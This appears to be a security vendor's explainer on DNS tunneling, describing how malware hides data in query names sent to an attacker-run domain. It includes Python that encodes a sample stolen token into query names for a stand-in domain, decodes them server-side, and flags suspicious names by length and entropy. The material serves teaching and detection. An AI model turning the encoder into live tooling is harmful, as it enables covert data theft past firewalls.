
What Is DNS Tunneling?

DNS tunneling is one of the most damaging DNS attacks. What exactly is it, and how does it work?


The Domain Name System (DNS) is the protocol that translates human-friendly domain names, such as paloaltonetworks.com, into the IP addresses machines use, such as 199.167.52.137. Attackers know that DNS is ubiquitous and trusted: almost every network has to let it through. Furthermore, because DNS was designed for name lookups rather than data transfer, many organizations do not inspect their DNS traffic for malicious activity. As a result, several DNS-based attacks can succeed against corporate networks. DNS tunneling is one of them.

How DNS Tunneling Works

DNS tunneling abuses the DNS protocol to carry arbitrary data, such as malware commands and stolen files, inside ordinary-looking DNS queries and responses exchanged between an infected client and an attacker-controlled server.

  1. The attacker registers a domain, such as badsite.com, and points its name server (NS) records at a server they control. The tunneling program runs on that server and acts as the domain’s authoritative name server.
  2. The attacker infects a computer, often one sitting behind the company’s firewall, with malware. Because outbound DNS is almost always permitted through the firewall, the infected machine can send queries to its configured DNS resolver. The resolver is the server that performs lookups on behalf of clients, walking from the root servers to the top-level domain (TLD) servers to the authoritative server for the domain in question. The malware encodes the data it wants to send into the subdomain labels of names under badsite.com (for example, an encoded chunk of a file as a label, followed by .badsite.com).
  3. Because the query is for a name under badsite.com, the resolver forwards it to the attacker’s authoritative server, which is also the command-and-control server. The server decodes the data carried in the query name and can send data back inside the response (for instance in TXT, CNAME or A records). Repeated queries and responses form a two-way channel between victim and attacker, relayed by the DNS resolver. The tunnel can be used to exfiltrate data, deliver commands or carry other malicious traffic, and because the victim never connects directly to the attacker’s server, the attacker’s infrastructure is harder to trace.
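As an added example (not code from this article or from Palo Alto Networks), the Python below shows both ends of the channel described in the three steps above: the infected client packing bytes into query names under badsite.com, and the attacker’s authoritative server recovering them from the labels, followed by two coarse checks a defender might run over resolver logs. The session label `s1`, the sample payload, the detection thresholds and the function names are all assumptions made for this example; nothing is sent over the network.

```python
import base64
import math
from collections import Counter

# Assumed values for this walkthrough: the attacker's domain from the article
# and a made-up session label. Nothing here touches the network.
TUNNEL_DOMAIN = "badsite.com"
MAX_LABEL = 63    # RFC 1035: one label is at most 63 octets
MAX_NAME = 253    # RFC 1035: 255 octets on the wire, 253 characters in text form

# Constructed sample payload ("stolen" key/value pairs), not real data.
SAMPLE = (b"user=alice;host=ws-0412;token=d3adb33f-1234-5678-9abc-def012345678;"
          b"note=quarterly-forecast.xlsx")


def encode_payload(session: str, data: bytes, labels_per_query: int = 3) -> list[str]:
    """Client side (step 2): pack bytes into DNS query names.

    The payload is base32-encoded so it survives case-insensitive resolvers,
    cut into 63-character labels, and a few labels are grouped per query as
    <seq>.<label>...<label>.<session>.badsite.com. The sequence number lets
    the server reorder queries that arrive out of order or are retried.
    """
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    queries = []
    for seq, i in enumerate(range(0, len(labels), labels_per_query)):
        body = ".".join(labels[i:i + labels_per_query])
        name = f"{seq}.{body}.{session}.{TUNNEL_DOMAIN}"
        if len(name) > MAX_NAME:
            raise ValueError("query name too long; lower labels_per_query")
        queries.append(name)
    return queries


def decode_queries(queries: list[str]) -> bytes:
    """Server side (step 3): the authoritative name server for badsite.com
    sees every query name and reassembles the payload from the labels."""
    suffix = 1 + TUNNEL_DOMAIN.count(".") + 1   # session label + domain labels
    chunks = {}
    for name in queries:
        labels = name.lower().rstrip(".").split(".")
        seq, body = int(labels[0]), labels[1:-suffix]
        chunks[seq] = "".join(body)
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the padding stripped by the client
    return base64.b32decode(b32)


def shannon_entropy(text: str) -> float:
    """Bits per character: random-looking base32 sits near 4-5, words near 2-3."""
    n = len(text)
    if n == 0:
        return 0.0
    counts = Counter(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_tunnel(name: str, max_subdomain_len: int = 52,
                      max_entropy: float = 4.0) -> bool:
    """Two coarse resolver-log checks (thresholds are assumptions; tune per site):
    an unusually long subdomain part, or one whose characters look random.
    Assumes the registrable domain is the last two labels, which is wrong for
    suffixes such as .co.uk; a real detector consults the public suffix list."""
    labels = name.lower().rstrip(".").split(".")
    subdomain = "".join(labels[:-2])
    return (len(subdomain) > max_subdomain_len
            or shannon_entropy(subdomain) > max_entropy)


if __name__ == "__main__":
    queries = encode_payload("s1", SAMPLE, labels_per_query=1)
    for q in queries:
        print(f"{len(q):3d} chars  tunnel={looks_like_tunnel(q)}  {q[:40]}...")
    print("round trip ok:", decode_queries(list(reversed(queries))) == SAMPLE)
    print("benign flagged:", looks_like_tunnel("www.paloaltonetworks.com"))
```

The client never opens a socket to badsite.com; it only asks its normal resolver for names, and the resolver’s own recursion delivers those names to the attacker’s server. That is why blocking the attacker’s IP at the firewall does nothing and why the queries themselves (length, label count, character distribution, volume per domain) are what a detector has to look at.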

DNS tunneling has been around for almost 20 years. Both the Morto and Feederbot malware have been used for DNS tunneling. Recent tunneling attacks include those from the threat group DarkHydrus, which targeted government entities in the Middle East in 2018, and OilRig, which has been operating since 2016 and is still active.

How do you stop attackers from using DNS against you? Read our white paper to learn the steps you can take to stop DNS attacks.
